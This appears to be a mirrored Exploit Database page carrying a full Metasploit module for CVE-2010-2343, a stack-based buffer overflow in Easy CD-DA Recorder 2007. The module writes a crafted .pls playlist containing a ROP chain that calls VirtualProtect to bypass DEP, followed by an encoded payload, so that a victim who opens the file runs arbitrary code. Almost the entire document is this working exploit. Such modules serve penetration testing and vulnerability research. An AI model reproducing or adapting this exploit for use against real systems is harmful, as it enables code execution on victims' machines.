Easy CD-DA Recorder – ‘.pls’ Local Buffer Overflow (Metasploit)

• Exploit Database
• 8 阅读

• 作者： Metasploit
  日期： 2014-02-13
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/31643/

• ##
  # This module requires Metasploit: http//metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::FILEFORMAT
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
  'Description'=> %q{
  This module exploits a stack-based buffer overflow vulnerability in
  Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
  By persuading the victim to open a specially-crafted .PLS file, a
  remote attacker could execute arbitrary code on the system or cause
  the application to crash. This module has been tested successfully on
  Windows XP SP3 and Windows 7 SP1.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'chap0',# Vulnerability discovery and original exploit
  'Gabor Seljan', # Metasploit module
  'juan vazquez'# Improved reliability
  ],
  'References' =>
  [
  [ 'BID', '40631' ],
  [ 'EDB', '13761' ],
  [ 'OSVDB', '65256' ],
  [ 'CVE', '2010-2343' ],
  [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]
  ],
  'DefaultOptions' =>
  {
  'ExitFunction' => 'process'
  },
  'Platform' => 'win',
  'Payload'=>
  {
  'DisableNops'=> true,
  'BadChars' => "\x0a\x3d",
  'Space'=> 2454,
  'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"# ADD ESP,-3500
  },
  'Targets'=>
  [
  [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
  # easycdda.exe 3.0.114.0
  # audconv.dll 7.0.815.0
  {
  'Offset' => 1108,
  'Ret'=> 0x1001b19b# ADD ESP,0C10 # RETN 0x04 [audconv.dll]
  }
  ]
  ],
  'Privileged' => false,
  'DisclosureDate' => 'Jun 7 2010',
  'DefaultTarget'=> 0))
  
  register_options(
  [
  OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])
  ],
  self.class)
  
  end
  
  def nops
  return make_nops(4).unpack("V").first
  end
  
  def rop_nops(n = 1)
  # RETN (ROP NOP) [audconv.dll]
  [0x1003d55d].pack('V') * n
  end
  
  def exploit
  
  # ROP chain generated by mona.py - See corelan.be
  rop_gadgets =
  [
  0x1007261e,# POP EDX # RETN [audconv.dll]
  0x0042a0e0,# &VirtualProtect() [IAT easycdda.exe]
  0x1003bd6b,# MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]
  0x10035802,# XCHG EAX,ESI # RETN [audconv.dll]
  0x1005d288,# POP EBP # RETN [audconv.dll]
  0x004030c8,# &PUSH ESP # RET 0x08 [easycdda.exe]
  0x1005cc2d,# POP EBX # RETN [audconv.dll]
  0x00000996,# 0x00000996-> EBX
  0x1008740c,# POP EDX # RETN [audconv.dll]
  0x00000040,# 0x00000040-> EDX
  0x1001826d,# POP ECX # RETN [audconv.dll]
  0x004364c6,# &Writable location [easycdda.exe]
  0x00404aa9,# POP EDI # RETN [easycdda.exe]
  0x100378e6,# RETN (ROP NOP) [audconv.dll]
  0x0042527d,# POP EAX # RETN [easycdda.exe]
  nops,
  0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
  ].flatten.pack('V*')
  
  sploit =rop_nops(target['Offset'] / 4)
  sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
  sploit << [target.ret].pack("V")
  sploit << rop_nops(22)
  sploit << rop_gadgets
  sploit << payload.encoded
  sploit << rand_text_alpha_upper(10000) # Generate exception
  
  # Create the file
  print_status("Creating '#{datastore['FILENAME']}' file ...")
  file_create(sploit)
  
  end
  end